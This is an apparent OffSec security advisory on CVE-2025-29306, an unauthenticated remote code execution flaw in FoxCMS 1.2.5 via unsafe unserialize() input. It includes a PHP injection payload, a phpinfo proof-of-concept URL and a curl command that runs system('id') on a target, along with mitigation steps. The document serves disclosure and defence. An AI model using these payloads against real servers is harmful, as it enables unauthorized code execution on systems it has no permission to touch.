/
CVE-2025-29306 – Unauthenticated Remote Code Execution in FoxCMS v1.2.5 via Unserialize Injection
Jul 3, 2025
CVE-2025-29306 – Unauthenticated Remote Code Execution in FoxCMS v1.2.5 via Unserialize Injection
Discover details about CVE-2025-29306, a critical RCE vulnerability in FoxCMS 1.2.5. Learn how unsafe use of PHP’s unserialize() function enables remote attackers to execute arbitrary system commands.
OffSec Team
Overview
CVE-2025-29306 is a critical remote code execution (RCE) vulnerability affecting FoxCMS version 1.2.5. The flaw stems from unsafe handling of the id parameter, which is passed directly into PHP’s unserialize() function without validation. Attackers can supply malicious serialized PHP objects that trigger arbitrary command execution via system().
- CVE ID: CVE-2025-29306
- Severity: Critical
- CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- EPSS Score: 71.52%
- Affected Version: FoxCMS ≤ 1.2.5
- Patched Version: None released as of writing
- Authentication Required: No
- Impact: Remote Code Execution
Technical Breakdown
FoxCMS uses unserialize() directly on user-supplied input from the id parameter. When a malicious serialized PHP object is supplied, FoxCMS inadvertently executes attacker-controlled PHP code.
A typical payload might inject PHP code such as:
${@print_r(@system("id"))}When deserialized and evaluated, this results in arbitrary OS command execution. This technique is known as PHP Object Injection (POI), leveraging unserialize() as the initial injection vector.
Conditions for Exploitation
- FoxCMS v1.2.5 installed and publicly reachable
- No login or authentication required
- PHP deserialization gadgets available in the environment
- PHP has shell access (default in many configurations)
Exploitation Steps
To compromise this lab, an attacker crafts a POST request to the vulnerable case display page, injecting PHP code that is subsequently written to a .php file.
Simple Browser PoC
A known exploit simply calls phpinfo(): Replace TARGET with the target’s URL or IP. Visiting the URL reveals full phpinfo output, confirming code execution.
http://TARGET/images/index.html?id=${@print(phpinfo())}PoC with curl
Swap out phpinfo() for an OS command, e.g. id:
curl "http://TARGET/images/index.html?id=%24%7B%40print%28system%28%22id%22%29%29%7D"This confirms the vulnerability and demonstrates remote code execution via unserialize-based injection in FoxCMS v1.2.5.
Mitigation
- No official patch exists yet. Users should:
- Remove or replace unserialize() usage with safer methods (e.g. JSON decoding)
- Filter or validate all input parameters
- Block public access to vulnerable pages
- Deploy WAF signatures to detect serialized payloads
- Disable dangerous PHP functions like system() if not needed
References
Stay in the know: Become an OffSec Insider
Get the latest updates about resources, events & promotions from OffSec!
Latest from OffSec
Research & Tutorials
CVE-2024-12029 – InvokeAI Deserialization of Untrusted Data vulnerability
CVE-2024-12029: A critical deserialization vulnerability in InvokeAI’s /api/v2/models/install endpoint allows remote code execution via malicious model files. Exploit risk for AI art servers.
Jul 17, 2025
0
Research & Tutorials
What is Phishing? Introduction to Phishing Demo (for Beginners)
Learn how phishing attacks work and how to spot them. Watch OffSec’s animated video to protect yourself from scams, spoofed sites, and social engineering.
Jul 15, 2025
2 min read
Research & Tutorials
CVE-2025-27636 – Remote Code Execution in Apache Camel via Case-Sensitive Header Filtering Bypass
Discover the critical Apache Camel vulnerability (CVE-2025-27636) that allows remote code execution via case-sensitive HTTP header manipulation in the exec component. Learn how attackers exploit this flaw and how to mitigate it.
Jul 10, 2025
2 min read